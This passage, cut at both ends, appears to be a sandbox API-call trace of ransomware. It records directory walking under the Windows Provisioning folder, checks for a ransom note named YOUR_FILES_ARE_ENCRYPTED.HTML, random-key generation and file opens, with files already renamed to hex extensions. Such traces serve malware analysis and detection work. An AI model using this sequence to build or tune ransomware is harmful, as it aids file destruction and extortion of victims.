(pszPath="customizations.xml.E9452ABCE27219A7F5EFA7067EABEB88371A6626C6558FC4B1A0ED15B0FB8756") returned=".E9452ABCE27219A7F5EFA7067EABEB88371A6626C6558FC4B1A0ED15B0FB8756" [0110.012] lstrlenW (lpString=".E9452ABCE27219A7F5EFA7067EABEB88371A6626C6558FC4B1A0ED15B0FB8756") returned 65 [0110.012] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0eac9f1, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0eac9f1, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0eac9f1, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.012] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.012] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml") returned 104 [0110.012] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.012] lstrlenW (lpString=".xml") returned 4 [0110.012] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.012] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x30c [0110.012] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=271) returned 1 [0110.012] CloseHandle (hObject=0x30c) returned 1 [0110.012] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaeb8cd84, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeb8cd84, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="Prov", cAlternateFileName="")) returned 1 [0110.012] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.012] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov") returned 89 [0110.012] GetProcessHeap () returned 0x600000 [0110.012] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.013] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov" [0110.013] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*" [0110.013] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaeb8cd84, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeb8cd84, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.014] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaeb8cd84, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeb8cd84, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="..", cAlternateFileName="")) returned 1 [0110.014] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime", cAlternateFileName="")) returned 1 [0110.014] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.014] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime") returned 97 [0110.014] GetProcessHeap () returned 0x600000 [0110.014] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0110.014] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime" [0110.014] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*" [0110.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaea56cde, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f46dc, dwReserved1=0x6f4628, cFileName=".", cAlternateFileName="")) returned 0x626638 [0110.015] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xaea56cde, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f46dc, dwReserved1=0x6f4628, cFileName="..", cAlternateFileName="")) returned 1 [0110.015] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e3a2a4, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e3a2a4, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0e60513, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x6f46dc, dwReserved1=0x6f4628, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0110.015] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.015] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml") returned 113 [0110.015] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.015] lstrlenW (lpString=".provxml") returned 8 [0110.015] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0110.015] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e86782, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e86782, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0e86782, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x71e, dwReserved0=0x6f46dc, dwReserved1=0x6f4628, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0110.015] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.015] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml") returned 113 [0110.015] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.015] lstrlenW (lpString=".provxml") returned 8 [0110.015] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0110.015] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaea53280, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaea53280, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaea5d169, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f46dc, dwReserved1=0x6f4628, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.015] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaea53280, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaea53280, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaea5d169, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f46dc, dwReserved1=0x6f4628, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.015] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0110.015] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0110.015] GetProcessHeap () returned 0x600000 [0110.015] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3184de8 [0110.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.016] GetProcessHeap () returned 0x600000 [0110.016] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3184de8 | out: hHeap=0x600000) returned 1 [0110.016] GetProcessHeap () returned 0x600000 [0110.016] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0110.016] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0e60513, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0e60513, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaeb90bb0, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x22f, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="RunTime.xml.0E7A4551C407F4B9B53A3F7562F5D06C94161D2E52E85CF88476A2B8E71BC71C", cAlternateFileName="RUNTIM~1.0E7")) returned 1 [0110.016] StrStrIW (lpFirst="RunTime.xml.0E7A4551C407F4B9B53A3F7562F5D06C94161D2E52E85CF88476A2B8E71BC71C", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.016] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.0E7A4551C407F4B9B53A3F7562F5D06C94161D2E52E85CF88476A2B8E71BC71C") returned 166 [0110.016] PathFindExtensionW (pszPath="RunTime.xml.0E7A4551C407F4B9B53A3F7562F5D06C94161D2E52E85CF88476A2B8E71BC71C") returned=".0E7A4551C407F4B9B53A3F7562F5D06C94161D2E52E85CF88476A2B8E71BC71C" [0110.016] lstrlenW (lpString=".0E7A4551C407F4B9B53A3F7562F5D06C94161D2E52E85CF88476A2B8E71BC71C") returned 65 [0110.016] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaea70737, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaea70737, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaea902b4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.016] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaea70737, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaea70737, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaea902b4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x19e5b0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.016] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.017] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0110.017] GetProcessHeap () returned 0x600000 [0110.017] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.017] GetProcessHeap () returned 0x600000 [0110.017] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.017] GetProcessHeap () returned 0x600000 [0110.017] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.018] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeb96c71, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeb96c71, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeb9b81f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.018] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaeb96c71, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaeb96c71, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaeb9b81f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.018] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.018] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0110.018] GetProcessHeap () returned 0x600000 [0110.018] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.019] GetProcessHeap () returned 0x600000 [0110.019] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.019] GetProcessHeap () returned 0x600000 [0110.019] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.020] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaebdea2e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaebdea2e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="{1e05dd5d-a022-46c5-963c-b20de341170f}", cAlternateFileName="{1E05D~1")) returned 1 [0110.020] StrStrIW (lpFirst="{1e05dd5d-a022-46c5-963c-b20de341170f}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.020] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}") returned 84 [0110.020] GetProcessHeap () returned 0x600000 [0110.020] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.021] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}" [0110.021] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*" [0110.021] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaebdea2e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaebdea2e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0110.021] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xaebdea2e, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaebdea2e, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0110.021] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa10504bd, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa10504bd, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xaebe5284, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x4ef, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="customizations.xml.97868653C4BD6B54E148F197B536BEE7F241ED3AEB0DD6E6706A99AFA0011038", cAlternateFileName="CUSTOM~1.978")) returned 1 [0110.021] StrStrIW (lpFirst="customizations.xml.97868653C4BD6B54E148F197B536BEE7F241ED3AEB0DD6E6706A99AFA0011038", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.021] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.97868653C4BD6B54E148F197B536BEE7F241ED3AEB0DD6E6706A99AFA0011038") returned 168 [0110.021] PathFindExtensionW (pszPath="customizations.xml.97868653C4BD6B54E148F197B536BEE7F241ED3AEB0DD6E6706A99AFA0011038") returned=".97868653C4BD6B54E148F197B536BEE7F241ED3AEB0DD6E6706A99AFA0011038" [0110.021] lstrlenW (lpString=".97868653C4BD6B54E148F197B536BEE7F241ED3AEB0DD6E6706A99AFA0011038") returned 65 [0110.021] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa102a24e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa102a24e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa102a24e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0110.021] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.021] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml") returned 104 [0110.021] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.021] lstrlenW (lpString=".xml") returned 4 [0110.021] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0110.021] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0110.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml" (normalized: "c:\\users\\all 